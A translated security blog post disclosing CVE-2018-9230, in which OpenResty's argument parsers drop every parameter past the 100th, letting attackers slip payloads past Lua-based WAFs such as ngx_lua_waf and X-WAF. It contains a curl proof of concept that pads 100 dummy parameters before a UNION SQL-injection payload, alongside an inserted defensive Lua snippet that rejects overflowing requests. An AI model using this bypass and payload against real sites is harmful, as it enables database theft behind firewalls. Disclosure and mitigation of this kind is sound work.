First published on Anquanke, link: www.anquanke.com/post/id/103…
0x00 Preface
OpenResty® is a high-performance web platform based on Nginx and Lua that bundles a large number of well-tested Lua libraries and third-party Nginx modules together with most of their dependencies.
OpenResty website: openresty.org
Vulnerability number: CVE-2018-9230
ngx.req.get_uri_args and ngx.req.get_post_args, which obtain the request parameters, do not account for parameter overflow, allowing a remote attacker to bypass OpenResty-based security protection; multiple open source WAFs are affected.
Affected versions: all OpenResty versions
0x01 Environment Setup
Operating environment: CentOS 6
Source version: openresty.org/download/op… (latest version on the official website)
0x02 Vulnerability Details
A. Obtaining URI parameters
Looking at the official API documentation first, there are two functions for obtaining request parameters: ngx.req.get_uri_args, which parses the arguments from the request URI (the query string), and ngx.req.get_post_args, which parses them from the body of a POST request.
Test case:
    server {
        listen 80;
        server_name localhost;
        location /test {
            content_by_lua_block {
                -- GET (query string) arguments
                local arg = ngx.req.get_uri_args()
                for k, v in pairs(arg) do
                    ngx.say("[GET ] key:", k, " v:", v)
                end
                -- POST (body) arguments; the body must be read first
                ngx.req.read_body()
                local arg = ngx.req.get_post_args()
                for k, v in pairs(arg) do
                    ngx.say("[POST] key:", k, " v:", v)
                end
            }
        }
    }
Test output:
B. Parameter case
When the same parameter name is submitted more than once, the values are collected in the order in which they are received.
However, parameter names are case-sensitive: id, Id and ID are treated as different parameters.
Parameter case is mentioned here as background for constructing and understanding the test cases that follow.
C. Parameter overflow
So what happens when the parameter list overflows? I constructed a test case to demonstrate: parameters a0 to a9, each repeated 10 times (10*10 = 100 parameters), followed by a 101st parameter carrying a SQL injection payload. Let's see what happens.
Test case:
    curl '127.0.0.1/test?a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a0=0&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a1=1&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a2=2&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a3=3&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a4=4&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a5=5&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a6=6&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a7=7&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a8=8&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&a9=9&id=1 union select 1,schema_name,3 from INFORMATION_SCHEMA.schemata'
Output result:
As you can see, when ngx.req.get_uri_args is used to retrieve the URI request parameters, only the first 100 parameters are returned; the 101st parameter is never retrieved. Now send the same parameters in a POST request:
The POST body retrieved with ngx.req.get_post_args likewise contains only the first 100 parameters.
Checking the documentation for both functions: by default at most 100 arguments are parsed, for security reasons, and each function accepts an optional argument that sets the maximum number of GET/POST arguments it should parse. However, as long as the number of parameters in a request exceeds that limit, an attacker can easily bypass OpenResty-based security checks, which is the URI parameter overflow problem.
In short: ngx.req.get_uri_args and ngx.req.get_post_args are used to obtain request parameters. When the number of submitted parameters exceeds the limit (the default of 100, or the value passed as the optional argument), the parameters overflow and those beyond the limit cannot be obtained. A WAF built on these functions therefore never sees the parameters an attacker places beyond the limit, and OpenResty-based web security can be bypassed.
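One way for an OpenResty-based WAF to close this gap, as an added example that is not code from the original post or from OpenResty: the snippet below belongs in an access_by_lua_block in the same location as the WAF rules. It assumes the second return value "truncated" (which I recall lua-nginx-module added in 0.10.13; check your changelog) and falls back to an unlimited raw count of the query string and form body, so overflow is detected on any version.

```lua
-- Added example (not from the original post or from OpenResty):
-- refuse requests whose argument count exceeds the parse limit,
-- because a WAF that saw only 100 of 101 arguments inspected nothing
-- beyond the 100th. Place in access_by_lua_block.
local MAX_ARGS = 100   -- must equal the limit the WAF passes to the parsers

-- Count raw "key=value" pairs with no limit, so arguments beyond the
-- 100th still count here even though the parser would drop them.
local function count_pairs(s)
    if not s or s == "" then return 0 end
    local n = 0
    for _ in string.gmatch(s, "[^&]+") do n = n + 1 end
    return n
end

-- Parse with an explicit limit and flag overflow two independent ways:
-- 1. the second return value "truncated" (lua-nginx-module 0.10.13+),
-- 2. the raw pair count above, which works on any version.
local function get_args_strict(parser, raw)
    local args, err = parser(MAX_ARGS)
    if err == "truncated" or count_pairs(raw) > MAX_ARGS then
        return nil, "argument overflow"
    end
    return args
end

local uri_args, err = get_args_strict(ngx.req.get_uri_args, ngx.var.args)
if not uri_args then
    ngx.log(ngx.WARN, "GET ", err, " from ", ngx.var.remote_addr)
    return ngx.exit(ngx.HTTP_BAD_REQUEST)
end

-- Only form bodies are parsed as key=value pairs; read the body first.
local post_args
local ctype = ngx.var.content_type or ""
if ctype:find("application/x-www-form-urlencoded", 1, true) then
    ngx.req.read_body()
    local body = ngx.req.get_body_data()  -- nil if spooled to a temp file
    if body then
        local perr
        post_args, perr = get_args_strict(ngx.req.get_post_args, body)
        if not post_args then
            ngx.log(ngx.WARN, "POST ", perr, " from ", ngx.var.remote_addr)
            return ngx.exit(ngx.HTTP_BAD_REQUEST)
        end
    end
end
-- uri_args and post_args now hold every argument the request carried
-- and can be handed to the WAF rules.
```

Rejecting on overflow is the safe direction: a legitimate client rarely sends more than 100 arguments, while any request that does has by definition not been fully inspected.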
0x03 Affected Products
ngx.req.get_uri_args and ngx.req.get_post_args are used to obtain request parameters with a default limit of 100, without accounting for parameter overflow. An attacker can construct more parameters than the limit and easily bypass the security checks.
Open source WAFs based on OpenResty, such as ngx_lua_waf, X-WAF and OpenStar, are affected.
A. ngx_lua_waf
ngx_lua_waf is a web application firewall based on lua-nginx-module (OpenResty).
Github source: github.com/loveshell/n…
Interception screenshot:
Bypass using parameter overflow:
B. X-WAF
X-WAF is a cloud WAF system aimed at small and medium-sized enterprises, so that they too can conveniently run their own free cloud WAF.
Official website: waf.xsec.io
Github source: github.com/xsec-lab/x-…
Interception screenshot:
Bypass using parameter overflow:
This article was originally published by Bypass at www.cnblogs.com/xiaozi/p/91… You are welcome to share it; when reprinting, please keep the source.
About me: a network security enthusiast dedicated to sharing original, high-quality practical content. Welcome to follow my personal WeChat public account, Bypass--, for more articles.